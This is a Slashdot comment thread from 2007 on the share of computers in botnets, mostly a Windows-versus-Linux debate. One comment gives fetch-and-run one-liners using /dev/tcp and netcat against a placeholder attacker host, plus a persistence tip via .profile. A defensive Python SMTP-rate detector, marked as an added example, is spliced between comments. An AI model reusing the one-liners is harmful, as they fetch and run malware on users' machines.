        > it's only a matter of time until the cost/benefit of launching a reasonably successful large-scale attack against the OS arrives.

        It's only a matter of time before some descendant of pigs evolves wings too.

        You have to make decisions based on what you see and know, not speculation. Right now, and for the foreseeable future, your best protection from trojans, worms and spyware is to install or purchase any OS besides Windoze.

        It's not just a solution, it's the solution. A diverse population of computers will make botnets both expensive and small.

        [ Parent ]
  • by Anonymous Coward on Friday January 26 2007, @05:52PM (#17777402)
    Or take privilege separation to its extreme and shield programs from each other. So you compromised the mail program? Great, you can't save an executable and your worm will be erased when the program is closed.
    (Murphy's law says programs will have bugs. So assume they will.)
    [ Parent ]
  • by Nutria (679911) on Friday January 26 2007, @05:52PM (#17777410)
    > Pass a law making it illegal to connect any OS to the internet that cannot be made bot-free.

    "Made bot-free"? Reinstalling Windows makes it bot-free.

    No, there has to be a NIST standard test for determining how many bots infect an operating system in 2 hours of "typical" surfing. (Determining what "typical" is, and preventing MSFT from corrupting the test are the hard parts.)

    Then, pass a law saying that network-providers can not let those OSs connect to their networks.

    [ Parent ]
  • 25% does seem a little high, but then again it's not hard to imagine that people who this affects don't talk with too many people online who they haven't met in person. Just today I was playing Counter-Strike (1.6 of course) and a fellow player revealed the reason for them not moving or shooting; a pop-up. This is hardly a rare occurrence. I can't empathise in any way with those who are perfectly content to accept their computer is infected with some sort of adware and believe there is nothing they can do to prevent the infection of such malware.
    [ Parent ]
    • Re:How to stop the bots by Anonymous Coward (Score:1) Friday January 26 2007, @07:00PM
    • Re:How to stop the bots by DittoBox (Score:1) Friday January 26 2007, @07:20PM
    • Re:How to stop the bots by alshithead (Score:3) Friday January 26 2007, @08:42PM
      • Re:How to stop the bots by suckmysav (Score:2) Friday January 26 2007, @10:23PM
      • Re:How to stop the bots (Score:4, Insightful)

        by TapeCutter (624760) on Friday January 26 2007, @10:56PM (#17780354)
        (Last Journal: Tuesday February 13 2007, @05:31PM)
        I agree! Not only that, joe sixpack buys his PC at the department store pre-laden with free trials and nag screens for firewalls, virus scanners, extended warranties, computer courses, etc., until the thing boots up at the same speed as the space shuttle. When it does finally boot up, shit pops up all over the place asking them to sign forms, etc. If they RTFM (and are lucky enough to have picked the correct one from the 10 available), it looks nothing like it. Yet these same people buy self-assembled furniture, pre-fab garden sheds, plug-n-play home theaters, and other such "puzzles" from the same store and have no ongoing problems.

        I can't count the number of people I have helped just sign up for the "pre-installed" ISP and get them on the net in the first place. They aren't "content", they complain to the store, then to the ISP, then just leave it in a corner until someone like me "fixes it" and shows them around the net. Sometimes they live with adware because they don't know how to clean it off but this doesn't mean they are not fucked off that they can't trust the thing to do their banking (as advertised).

        Blaming average users because someone is screwing them over is arrogance of the highest order, it amounts to condemning the victims - a very ugly attitude in my books.
        [ Parent ]
      • Re:How to stop the bots by kakalaky (Score:1) Friday January 26 2007, @11:24PM
      • Re:How to stop the bots by zcat_NZ (Score:1) Saturday January 27 2007, @02:56AM
    • What about "Windows malicious software removal"? by Joce640k (Score:3) Saturday January 27 2007, @04:54AM
  • by BSAtHome (455370) on Friday January 26 2007, @05:53PM (#17777420)
    However, it is much harder to do it effectively. If it is 10 times harder to take over a *nix box than a MS box, then you have decimated the bot threat in a simple way.
    [ Parent ]
  • Re:Just install linux (Score:5, Insightful)

    botnets on *nix are easy. Most on windoze are deployed via idiot lusers just like most other malcode.

    On linux, you only need a script that does the equivalent of this:

    malcode < /dev/tcp/h4xx0rsbox/80
    Or, if you have netcat available to you and prefer to use that tool:

    nc h4xx0rsbox 80 | malcode
    Or just include all the tcpip stuff in the trojan the idiot linux luser runs. It's easy enough to add it to their .profile or .shellrc, so it runs every time they log in, right?

    These things aren't after your own files and such. They are after your network resources, and these are trivial to get, even on *nix, my friend. When linux is popular amongst the idiots who run everything that they are sent or directed to download, they will certainly run it on that platform. And doing this stuff on linux is far more trivial than doing it on windoze thanks to the standard 'dev' tools and shells that are pretty much guaranteed to be available to the attacker.
    [ Parent ]
  • Re:Doesn't care or doesn't know? (Score:3, Insightful)

    by abigor (540274) on Friday January 26 2007, @06:01PM (#17777582)
    She won't get infected with anything if:

    1. She is behind a router, like a cheapo Linksys or something, so her ip is not routable over the wan.

    2. She doesn't use IE.

    3. She has auto-updates turned on.

    I've had my similarly illiterate mom on such a setup for several years now, and she's never been infected.
    [ Parent ]
  • Re:Just install linux (Score:3, Funny)

    by The_Wilschon (782534) on Friday January 26 2007, @06:02PM (#17777614)
    (http://www-cdf.fnal.gov/ | Last Journal: Wednesday June 13, @11:39AM)

    > Just install linux or other unix'es and it's solved. Start by convincing your friend to buy MS free computers. After 2 weeks of struggle to lose the old habits they will get used and thank you for it.

    Wait. I thought the point of getting them to switch was so that they wouldn't get used.
    [ Parent ]
  • by Ant P. (974313) <anthony.parsons@manx.net> on Friday January 26 2007, @06:07PM (#17777694)
    Congratulations! You just outlawed anything capable of running a CGI script.
    [ Parent ]
  • by multipart/mixed (163409) on Friday January 26 2007, @06:07PM (#17777698)
    I don't know... if you can correctly identify persons about to become rapists in a park, would it be unethical to kill them (erase their brain, castrate them, whatever to make it not happen?).

    [ Parent ]
  • by techno-vampire (666512) on Friday January 26 2007, @06:10PM (#17777732)
    (http://zeff.us/)
    And how is that going to affect computers in other countries? Do you really expect every, single nation in the world to pass a law like that?
    [ Parent ]
  • Trashing botted PCs?
    Ethical - yes.
    Legal - no.
    Fun - oh hell yeah.
    [ Parent ]
  • by goombah99 (560566) on Friday January 26 2007, @06:20PM (#17777862)
    It says 1 in 4 are infected. But let's drill down. First take out all the mac and linux and Unix computers since the botnet rate, while not zero, is probably not significant. We can also exclude most but not all embedded systems. Since mac and linux and Unix, and embedded systems account for more than a quarter of the market this means that most Windows computers are infected at a rate closer to 1 in 3.

    Next remove all the server clusters and the majority of computers in highly active IT business environments. We can probably exclude most military computers. That takes out another quarter of the machines.

    So basically your personal computer at home or poorly maintained business machines are carrying the bulk of the infection and it's not entirely way off to say the botnet rate is 1 in 2 for windows.

    [ Parent ]
    • Re:EVEN MORE SCARY it's 1 in 2 windows computers. by Archeopteryx (Score:2) Friday January 26 2007, @06:29PM
    • Actually, you have not taken this analysis far enough. Next you must remove all computers owned by cats, as cats are fastidious animals, and as natural hunters quite concerned with security. My research says 10% of all windows computers are owned by cats.

      Next, you can't count windows computers that have been smashed with sledgehammers. If you can't figure out why, I pity you. My research says that 17.54979% of all windows computers have been smashed with sledgehammers.

      Also, it would be ridiculous to count computers that have been taken over by Skynet. Technically, they ARE part of a botnet, but this is really a separate, and very real, very important issue. Here, my research indicates over 1/4 of all windows computers are now part of skynet, so we have to count those out.

      As everyone knows, there are a significant number of aliens present on the planet, and a significant number of them are silicon based life forms posing as high end windows computers while they pursue research for their doctoral dissertations on the common homo-sapien couch potato. This amounts to about 22% of windows computers.

      We can therefore conclude that, if I've done my math right, 2 out of every 1 windows computer is part of a botnet!
      [ Parent ]
  • Teenage Drivers (Score:3, Interesting)

    by goombah99 (560566) on Friday January 26 2007, @06:30PM (#17778010)
    Insurance rates on teenage drivers are higher. We don't say all cars must be accident free but we recognize group risks are higher for some identifiable groups. insurance rates are higher if you own a race car.

    ISP connection fees should be regulated so that if you own a windows computer you are treated as astronomically more likely to poison the internet than if you don't.

    Note I'm not saying that because that windows machines pay more because there are more windows botnets. That would not be fair since there are more windows machines out there so naturally they have more instances of botnets. The second thing is that windows bots hurt other windows users more than they hurt the rest of us. So they can't be penalized for that either.

    What I am saying is that
    1) per capita windows machines have more bots than other systems
    2) that bots don't just hurt windows user but do affect others.

    [ Parent ]
  • by BewireNomali (618969) on Friday January 26 2007, @06:37PM (#17778108)
    good night and good luck.
    [ Parent ]
  • by alienmole (15522) on Friday January 26 2007, @07:04PM (#17778498)

    > So, rather than walk over and plug the barrel of the cannon (to use your analogy), you'd call in an air strike on the whole house?

    It's the only way to be sure.
    [ Parent ]
  • > In the "good old days" this problem would've been fixed in 10 seconds by cutting all of Eastern Europe off the net completely. Too bad it can't be done any more.

    Which "good old days" were those, exactly? When has anyone ever cut off Internet access to entire parts of the world due to network abuse? Sure, individual admins may choose to block access to their own networks from various places, but that's hardly the same thing.

    [ Parent ]
  • Re:Just install linux (Score:3, Informative)

    by fleischdot (1005819) on Friday January 26 2007, @07:18PM (#17778660)
    Well, this Friday I've disinfected two of our (Linux) servers which have been infiltrated by abusing vulnerable CRM Software (customers' installations). It doesn't matter if you jail this software and put it behind firewalls; these days it also doesn't matter what kind of architecture your server hardware is. It's way enough having a simple webserver with scripting capabilities and one single hole in the web software. The toolbox of today's crackers (or should I name them botnet consultants?) is huge enough to have success with simple trial and error. If the machine refuses to run x86 binaries, there are plenty of perl and/or php scripts doing the same stuff. Today was really frustrating since I found 3 Megs of well-designed tools and good code on a formerly known secure machine. The quality of the tools leads me to the thought that a) crackers are well organized and b) paid for their work. Another frustrating part is the communication with different abuse helpdesks to track down this crap. Not to mention that all ended up in Romania... Sorry for sarcasm, but do you have *ANY* laws?

    Oh... this is not my day, even slashdot's captcha offers me "punisher" ... I ask myself, why always me??
    [ Parent ]
  • Bad statistics (Score:2)

    by EmbeddedJanitor (597831) on Friday January 26 2007, @08:11PM (#17779168)
    OK, I agree that Windows is likely to be a bot host, but your stats are bad.

    To draw the conclusion that Windows is bot friendly and Linux is bot-hostile is bad stats because there are other factors that come into the equation.

    To set up and run Linux requires a degree of net-savviness beyond what default Windows requires. Thus installations running Linux are likely to be run by better informed people who are bot-aware and take precautions. I run Linux at home and am pretty sure I don't have any bots. I also power down everything when not in use too. However, at work we run Windows hosts. The IT guys have very tight security and I would expect that they have zero bots either.

    [ Parent ]
  • > Wouldn't it make more sense to fine companies that sell inherently insecure OS's?

    Couldn't agree more. I'm a reluctant Windows user (Locked in to their servers, dev tools, and other technology long, long ago. It's too late for me... Save yourself.) and the latest M$ scheme really leaves me speechless. Now with "OneCare" they are selling you security-related services for their OSes! Shhhheeeee-it. P.T. Barnum must be rolling in his grave, wishing he'd thought this up. That's like selling me a car, then telling me it's defective and for another $1,000 you'll fix a problem that may cause it to explode while driving.

    [ Parent ]
  • by donaldm (919619) on Friday January 26 2007, @09:31PM (#17779808)
    > Start by convincing your friend to buy MS free computers

    This can be quite difficult and can limit your friend's choice. Unfortunately in the majority of cases you will have to install the Linux OS for them or better still get them to do the install with you advising them and jotting down notes for them. When you are finished with the basic install you should get them to do it again which is great for a simple disaster recovery exercise and gives your friend a good deal of confidence. It is even more fun if you can get a group of friends to do this.

    In principle putting Linux on a PC is an excellent way of reducing malware on the Internet however it must be remembered that the people who get problems are normally computer illiterate and treat a computer like a commodity item that to them is an interactive TV. You don't have to be a Unix/Linux guru to install and maintain Linux software but you do have to be prepared to learn and one of the major learning areas is security and basic system administration. Unix/Linux does force you to do some learning and this is its major strength and its weakness. It is possible to get worms and other malware on *nix machines but being aware of this and how to combat them reduces the risk. Again a little knowledge and a willingness to learn goes a long way. I have personally found that most people can easily learn to work under Linux however you do need to be able to motivate them.

    To gently force people to learn how to work under Linux, you need to only install Linux on the PC and this means no dual booting because I can guarantee that the user of the machine will backslide to a Microsoft OS. What about "games" I hear you say well there is Wine and other emulation software as well as consoles (sorry could not resist) that can help but the reality is you won't be able to run the latest Microsoft OS compatible games. Of course if Game Manufacturers (they go where the money is and at the moment it is Microsoft) become aware of more and more Linux users then you will see games that will run natively under Linux. It is happening but slowly.

    Microsoft may have popularised the Internet but they glossed over the fact that you as the user need to do some learning and this is the major reason why we have malware on the Internet.
    [ Parent ]
  • by Divebus (860563) on Friday January 26 2007, @09:53PM (#17779938)
    Everyone connects to an ISP somewhere. I'd suggest legislating the ISPs to disconnect home users if their account/connection port makes X attempts at SMTP traffic per minute. That could be completely automated. You could go deeper and read the SMTP envelope for spoofed headers. When the [-L]user calls for tech support... tell them to clean up their machine.
    [ Parent ]
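
The per-port SMTP rate threshold proposed in the comment above, sketched as an added example that is not part of the original thread: a sliding 60-second window over outbound connection records, flagging any subscriber whose attempts to TCP port 25 exceed a limit. The record format (`epoch subscriber dst_ip dst_port`), the subscriber IDs, the limit of 20 and the distinct-destination count are all assumptions, and the sample records are constructed.

```python
from collections import defaultdict, deque
from dataclasses import dataclass

SMTP_PORT = 25
WINDOW_SECONDS = 60
MAX_ATTEMPTS = 20  # stands in for the comment's "X"; the value is an assumption


@dataclass
class Alert:
    tripped_at: float    # timestamp of the attempt that first exceeded the limit
    peak_attempts: int   # largest number of attempts seen inside one window
    distinct_dests: int  # distinct destination IPs in that peak window


def parse_flow(line):
    """Parse 'epoch subscriber dst_ip dst_port'; return None if malformed."""
    parts = line.split()
    if len(parts) != 4:
        return None
    try:
        return float(parts[0]), parts[1], parts[2], int(parts[3])
    except ValueError:
        return None


def find_smtp_offenders(lines, max_attempts=MAX_ATTEMPTS, window=WINDOW_SECONDS):
    """Return {subscriber: Alert} for subscribers exceeding the SMTP rate limit."""
    # Sort by timestamp so the window logic also works on out-of-order exports.
    flows = sorted(f for f in map(parse_flow, lines) if f is not None)
    recent = defaultdict(deque)  # subscriber -> (ts, dst_ip) inside the window
    alerts = {}
    for ts, subscriber, dst_ip, dst_port in flows:
        if dst_port != SMTP_PORT:
            continue
        q = recent[subscriber]
        q.append((ts, dst_ip))
        # Evict attempts that have aged out of the window.
        while ts - q[0][0] >= window:
            q.popleft()
        if len(q) <= max_attempts:
            continue
        alert = alerts.get(subscriber)
        if alert is None:
            alerts[subscriber] = Alert(ts, len(q), len({ip for _, ip in q}))
        elif len(q) > alert.peak_attempts:
            alert.peak_attempts = len(q)
            alert.distinct_dests = len({ip for _, ip in q})
    return alerts


def constructed_sample():
    """Constructed records (documentation address ranges), not real traffic."""
    lines = []
    # cust-0001: ordinary mail client, three submissions to one relay, some web.
    for i in range(3):
        lines.append(f"{1000 + i * 200} cust-0001 192.0.2.10 25")
    lines.append("1005 cust-0001 198.51.100.7 443")
    # cust-0002: 45 attempts in about 22 seconds, each to a different server.
    for i in range(45):
        lines.append(f"{1000 + i * 0.5} cust-0002 203.0.113.{i + 1} 25")
    # cust-0003: 25 attempts in total, but only one per minute.
    for i in range(25):
        lines.append(f"{1000 + i * 60} cust-0003 192.0.2.25 25")
    # Malformed record: skipped by the parser instead of aborting the run.
    lines.append("not-a-timestamp cust-0004 192.0.2.99 25")
    return lines


if __name__ == "__main__":
    for sub, alert in find_smtp_offenders(constructed_sample()).items():
        print(sub, alert)
```

The distinct-destination count separates a machine spraying many mail servers from a customer sending a large batch through a single relay, which a raw per-minute count alone cannot distinguish.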
  • by cafucu (918264) on Friday January 26 2007, @10:54PM (#17780336)
    How about the gov't requires microsoft to allow service pack installation on any windows box, whether it was pirated or not? This would clean up a lot of machines that otherwise would be eternal bots.
    [ Parent ]
  • by Jerry Smith (806480) <icl151@gmail.com> on Saturday January 27 2007, @02:54AM (#17781602)
    (http://www.jaspergoes.nl/ | Last Journal: Monday July 02, @12:06AM)
    > It's like fining companies whose (physical) windows break after somebody throws a rock through it instead of going after the guilty party.

    It's not a crime to have your window broken, at least not in the part of the world I reside in. If I, a random person, told you to throw a rock at someone, and you did that, who would be responsible for the damage? You would not do this of course, but a child might do it. And then whose responsibility would it be then? The parents, I assume. They might not be guilty, just responsible.
    So everyone having his computer turned into a bot should have restricted access to the public space of the Web. 'Yes but no but..' that's not important, experience cannot be bought or earned, it's something that grows with practice, and starts with zero.
    [ Parent ]